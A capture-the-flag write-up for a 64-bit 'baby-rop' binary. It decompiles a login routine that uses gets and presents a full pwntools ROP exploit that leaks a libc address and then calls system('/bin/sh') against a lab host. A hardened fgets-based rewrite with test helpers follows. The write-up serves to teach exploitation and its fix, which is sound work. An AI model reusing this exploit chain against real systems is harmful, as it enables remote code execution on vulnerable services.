# Binary Exploitation

| Challenge | Link |
|---|---|
| baby-rop (100 pts) | [Here](#baby-rop-100-pts) |

## baby-rop (100 pts)

### Description

\-

### Solution

The challenge binary is a 64-bit ELF; open it in IDA.

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  v3 = time(0LL);
  srand(v3);
  login_user();
  return 0;
}
```

From `main` we can see that several functions are called. Let's take a look at `login_user`, since the other calls come from the standard library.

```c
int login_user()
{
  char v1[48]; // [rsp+0h] [rbp-40h] BYREF
  int v2; // [rsp+30h] [rbp-10h]

  puts("== Welcome to the TurboLike v1.0 login portal ==");
  puts("Tell me your name and I will tell you your uid!");
  puts("Just don't tell me your name is admin, that would be too easy ;)");
  printf("Name: ");
  v2 = rand();
  gets(v1);
  printf("Hello, %s your uid is %d!\n", v1, v2);
  if ( v2 != 1337 )
    return puts("You are not admin!");
  puts("Welcome back admin! Tell me your secret and I will store it for you!");
  return store_secret();
}
```

In `login_user` there is a call to the vulnerable function `gets`, which reads input with no length limit, so we can overflow `v1` and control the execution flow. Since the objective is remote code execution, the plan is to leak a libc address first and then pop a shell by calling `system`. The script below solves the challenge.

```python
#!/usr/bin/python3
from pwn import *

exe = './vuln_patched'
elf = context.binary = ELF(exe, checksec=True)

ld = ELF("./ld-2.39.so")

rop = ROP(elf)
libc = './libc.so.6'
libc = ELF(libc, checksec=False)

# context.log_level = 'debug'
context.terminal = ["tmux", "splitw", "-h", "-l", "65%"]

host, port = '10.104.16.2', 5015

def initialize(argv=[]):
    # GDB=1 -> debug locally, RM=1 -> connect to the remote target, otherwise a plain local process
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript)
    elif args.RM:
        return remote(host, port)
    else:
        return process([exe] + argv)

gdbscript = '''
b *0x4012A7
'''.format(**locals())

def exploit():
    global r
    r = initialize()
    r.recvuntil(b"Name: ")
    POP_RDI = 0x00000000004011fe      # pop rdi ; ret gadget in the binary
    PUTS_GOT = elf.got['puts']        # GOT slot holding the resolved libc address of puts
    PUTS_PLT = elf.symbols['puts']    # puts@plt, used to print that slot
    OFFSET = b"a" * 0x48              # 0x40 bytes from v1 up to rbp, plus 8 bytes of saved rbp, reaches the return address
    MAIN_PLT = 0x4012FC               # return into main so we get a second round of input
    # Stage 1: puts(puts@got) leaks the libc address of puts, then the chain restarts main
    payload = OFFSET + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    r.sendline(payload)
    r.recvuntil(b" admin!\n")
    leak = u64(r.recvline().strip().ljust(8, b"\x00"))
    libc.address = leak - libc.symbols['puts']   # rebase libc from the leaked puts address
    print(hex(libc.address))
    r.recvuntil(b"Name: ")
    system = libc.symbols['system']
    sh = next(libc.search(b'/bin/sh'))
    # Stage 2: system("/bin/sh"); the extra ret gadget keeps the stack 16-byte aligned before the call
    payload = OFFSET + p64(POP_RDI) + p64(sh) + p64(0x000000000040101a) + p64(system)
    r.sendline(payload)
    r.interactive()

if __name__ == '__main__':
    exploit()
```
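The root cause of the whole chain is the unbounded `gets` call in `login_user`. As an added example (not part of the original write-up or the challenge binary), here is a hardened version of the same login routine in C. It keeps the 48-byte name buffer and the admin uid of 1337 from the decompilation, but reads the name with `fgets` and rejects any line that does not fit, so neither `v2` nor the saved return address can be overwritten. The function names `read_name`, `login_user_safe`, `login_from_string` and `login_with_name_length` are hypothetical, the uid is passed in instead of drawn from `rand()` so the behaviour is deterministic, and all inputs are constructed:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX 48      /* size of v1 in the decompiled login_user */
#define ADMIN_UID 1337   /* the value login_user compares v2 against */

/* Result codes for read_name(); hypothetical names, not from the binary. */
enum { NAME_OK = 0, NAME_EOF = 1, NAME_TOO_LONG = 2 };

/* Bounded replacement for gets(): reads one line from `in` into name[NAME_MAX].
 * In the original, v1[48] is followed on the stack by v2, the saved rbp and
 * the return address, so gets() could write through all of them. fgets() never
 * writes more than NAME_MAX bytes, and a line that does not fit is rejected
 * (and drained) instead of silently truncated. */
int read_name(FILE *in, char name[NAME_MAX])
{
    if (fgets(name, NAME_MAX, in) == NULL) {
        name[0] = '\0';
        return NAME_EOF;
    }
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';
        return NAME_OK;
    }
    /* No newline in the buffer: either the line was exactly NAME_MAX-1 chars
     * (the next char is '\n' or EOF, so it fit) or it was longer (reject). */
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return NAME_OK;
    while (c != EOF && c != '\n')
        c = fgetc(in);
    name[0] = '\0';
    return NAME_TOO_LONG;
}

/* Hardened login_user: same greeting and uid check, bounded read.
 * Returns 1 if uid is the admin uid, 0 if not, -1 if the input was rejected. */
int login_user_safe(FILE *in, int uid, char *name_out)
{
    char name[NAME_MAX];
    int rc = read_name(in, name);
    if (rc != NAME_OK) {
        puts("Name rejected: empty stream or longer than 47 characters.");
        return -1;
    }
    printf("Hello, %s your uid is %d!\n", name, uid);
    if (name_out)
        memcpy(name_out, name, NAME_MAX);
    return uid == ADMIN_UID;
}

/* Test helper: feeds a constructed string through login_user_safe via a
 * temporary FILE so the routine can be exercised without a terminal. */
int login_from_string(const char *input, int uid, char *name_out)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return -1;
    fputs(input, f);
    rewind(f);
    int rc = login_user_safe(f, uid, name_out);
    fclose(f);
    return rc;
}

/* Test helper: a name of n 'a' characters plus newline (constructed input,
 * mirroring the b"a" * 0x48 padding used by the exploit script). */
int login_with_name_length(size_t n, int uid)
{
    char *line = malloc(n + 2);
    if (line == NULL)
        return -1;
    memset(line, 'a', n);
    line[n] = '\n';
    line[n + 1] = '\0';
    int rc = login_from_string(line, uid, NULL);
    free(line);
    return rc;
}

int main(void)
{
    printf("3-char name, admin uid  -> %d\n", login_with_name_length(3, ADMIN_UID));
    printf("47-char name, admin uid -> %d\n", login_with_name_length(47, ADMIN_UID));
    printf("0x48-char name          -> %d\n", login_with_name_length(0x48, ADMIN_UID));
    return 0;
}
```

With this change the 0x48-byte padding from the exploit script is rejected outright rather than reaching the saved return address; the remaining protections the write-up relies on being absent (stack canaries, PIE) would then be defence in depth rather than the only barrier.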

![](/files/EvISOWNWSUUfjp2KcQ4t)

Flag: CBC{hex_value}
